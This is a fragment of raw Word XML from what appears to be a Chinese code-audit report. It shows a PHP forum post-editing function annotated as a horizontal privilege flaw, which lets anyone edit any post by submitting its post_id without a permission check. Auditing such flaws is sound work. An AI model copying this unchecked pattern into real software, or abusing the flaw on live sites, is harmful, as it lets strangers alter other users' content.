            <v:rect id="_x0000_s5251" style="position:absolute;left:1897;top:11468;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5250" style="position:absolute;left:1997;top:11468;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5249" style="position:absolute;left:2097;top:11468;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5248" style="position:absolute;left:2197;top:11468;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5247" style="position:absolute;left:2297;top:11468;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5246" style="position:absolute;left:2397;top:11468;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5245" style="position:absolute;left:2497;top:11468;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5244" style="position:absolute;left:2597;top:11468;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5243" style="position:absolute;left:2717;top:11468;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5242" style="position:absolute;left:1617;top:11731;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5241" style="position:absolute;left:1797;top:11794;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5240" style="position:absolute;left:1897;top:11794;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5239" style="position:absolute;left:1997;top:11794;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5238" style="position:absolute;left:2097;top:11794;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5237" style="position:absolute;left:2197;top:11794;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5236" style="position:absolute;left:2297;top:11794;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5235" style="position:absolute;left:2397;top:11794;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5234" style="position:absolute;left:2497;top:11794;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5233" style="position:absolute;left:2597;top:11794;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5232" style="position:absolute;left:3561;top:11794;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5231" style="position:absolute;left:3681;top:11794;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5230" style="position:absolute;left:3802;top:11794;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5229" style="position:absolute;left:3922;top:11794;width:3133;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5228" style="position:absolute;left:1617;top:12057;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5227" style="position:absolute;left:1797;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5226" style="position:absolute;left:1897;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5225" style="position:absolute;left:1997;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5224" style="position:absolute;left:2097;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5223" style="position:absolute;left:2197;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5222" style="position:absolute;left:2297;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5221" style="position:absolute;left:2397;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5220" style="position:absolute;left:2497;top:12120;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5219" style="position:absolute;left:2597;top:12120;width:1687;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5218" style="position:absolute;left:4284;top:12120;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5217" style="position:absolute;left:4404;top:12120;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5216" style="position:absolute;left:4525;top:12120;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5215" style="position:absolute;left:4645;top:12120;width:2290;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5214" style="position:absolute;left:1617;top:12383;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5213" style="position:absolute;left:1797;top:12446;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5212" style="position:absolute;left:1897;top:12446;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5211" style="position:absolute;left:1997;top:12446;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5210" style="position:absolute;left:2097;top:12446;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5209" style="position:absolute;left:2197;top:12446;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5208" style="position:absolute;left:2297;top:12446;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5207" style="position:absolute;left:2397;top:12446;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5206" style="position:absolute;left:2497;top:12446;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5205" style="position:absolute;left:2597;top:12446;width:1928;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5204" style="position:absolute;left:4525;top:12446;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5203" style="position:absolute;left:4645;top:12446;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5202" style="position:absolute;left:4766;top:12446;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5201" style="position:absolute;left:4886;top:12446;width:2531;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:group>
        </w:pic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5199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ed="f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  <w:rPr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/**</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="62"/>
                    <w:ind w:left="680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 xml:space="preserve">*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执行编辑帖子</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112"/>
                    <w:ind w:left="680" w:right="50"/>
                    <w:rPr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>* @return void</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="680" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>*/</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="65"/>
                    <w:ind w:left="161" w:right="4012"/>
                    <w:jc w:val="center"/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水平权限缺陷</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-53"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>02</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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public</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> function doPostEdit(){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// echo 2</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>;die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$checkContent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' ', '',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'content']);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$checkContent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'&lt;br /&gt;', '',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$checkContent);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$checkContent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'&lt;p&gt;', '',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$checkContent);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$checkContent = str_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'&lt;/p&gt;', '',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$checkContent);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 w:firstLine="799"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$checkContents = </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>preg_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>replace(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>'/&lt;img(.*?)</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>src</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>=/i','img',$checkContent)</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="180"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="99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51" w:firstLine="799"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$checkContents = </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>preg_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>replace(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>'/&lt;embed(.*?)</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>src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=/i','img',$checkConten </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ts);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3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strlen(t($_POST['title']))==0)</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="65" w:line="338" w:lineRule="auto"/>
                    <w:ind w:left="980" w:right="1893" w:hanging="800"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$th</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>is-&gt;</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>error(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rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>帖子标题不能为空</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'); if(strlen(t($checkContents))==0)</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="259" w:lineRule="exact"/>
                    <w:ind w:left="180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error(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rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>帖子内容不能为空</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112"/>
                    <w:ind w:left="980" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>preg_match_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>all(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'/./us', t($_POST['title']),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$match);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="4371"/>
                    </w:tabs>
                    <w:spacing w:before="65"/>
                    <w:ind w:left="980" w:right="50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count($match[0])&gt;30){</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:tab/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汉字和字母都为一个</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="50"/>
                    <w:ind w:left="18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color w:val="333333"/>
                      <w:w w:val="99"/>
                    </w:rPr>
                    <w:t>字</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="64"/>
                    <w:ind w:left="1076" w:right="673"/>
                    <w:jc w:val="center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error(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rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>帖子标题不能超过</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-56"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>30</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-76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个字</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>');</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112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 xml:space="preserve">$post_id = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>intval(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$_POST['post_id']);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124"/>
                    <w:ind w:left="9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>title'] = t($_POST['title']);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'content'] = h($_POST['content']);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5198" type="#_x0000_t202" style="width:339.45pt;height:572.4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980"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$res =</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126" w:line="314" w:lineRule="auto"/>
                    <w:ind w:left="180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  <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>D(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'weiba_post')-&gt;where('post_id='.$post_id)-&gt;save($d </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ata);//</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>直接提交</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-57"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>post_id</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-76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即可编辑任意帖子，未进行权限认证</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="45"/>
                    <w:ind w:left="963" w:right="3737"/>
                    <w:jc w:val="center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$res!==false){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="1380"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$post_detail =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380" w:hanging="1200"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t xml:space="preserve">D('weiba_post')-&gt;where('post_id='.$post_id)-&gt;find(); </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>if(intval($_POST['log'])==1){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line="328" w:lineRule="auto"/>
                    <w:ind w:left="180"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>D(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'log')-&gt;writeLog($post_detail['weiba_id'],$this-&gt;m </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>id,'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>编辑了帖子</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">“&lt;a </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>href="'.U('weiba/Index/postDetail',array('post_id'=&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="52" w:line="391" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="337"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$post_id)).'" </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>target="_blank"&gt;'</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>.$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post_detail['title'].'&lt;/a&gt;”','pos </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ts');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3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65"/>
                    <w:ind w:left="138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同步到微博</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112"/>
                    <w:ind w:left="1380"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$feedInfo =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337"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>D(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'feed_data')-&gt;where('feed_id='.$post_detail['feed_ </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>id'])-&gt;find();</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="388" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="2250" w:firstLine="1200"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$datas = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>unserialize(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$feedInfo['feed_data']);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="217" w:lineRule="exact"/>
                    <w:ind w:left="138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datas[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'content'] = '</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>【</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'.$data['title'].'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>】</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112"/>
                    <w:ind w:left="180"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'.</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>getShort(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>t($check</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>Content),100).' ';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datas[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'body'] = $datas['content'];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data1[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'feed_data'] = serialize($datas);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data1[</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'feed_content'] = $datas['content'];</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124"/>
                    <w:ind w:left="1380"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$feed_id =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337"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>D(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'feed_data')-&gt;where('feed_id='.$post_detail['feed_ </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>id'])-&gt;save($data1);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 w:line="314" w:lineRule="auto"/>
                    <w:ind w:left="1380" w:hanging="1200"/>
                  </w:pPr>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>model(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'Cache')-&gt;rm('fd_'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>.$post_detail['feed_id']); return $this-&gt;ajaxReturn($post_id,</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-70"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>编辑成功</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>',</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="45"/>
                    <w:ind w:left="180"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>1);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="98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5168" style="width:337.75pt;height:67.4pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6755,1348">
            <v:rect id="_x0000_s5197" style="position:absolute;left:5;top:5;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5196" style="position:absolute;left:185;top:218;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5195" style="position:absolute;left:285;top:218;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5194" style="position:absolute;left:385;top:218;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5193" style="position:absolute;left:485;top:218;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5192" style="position:absolute;left:585;top:218;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s5191" style="position:absolute;left:685;top:218;width:100;height:259" fillcolor="#f8f8f8" stroked="f"/>
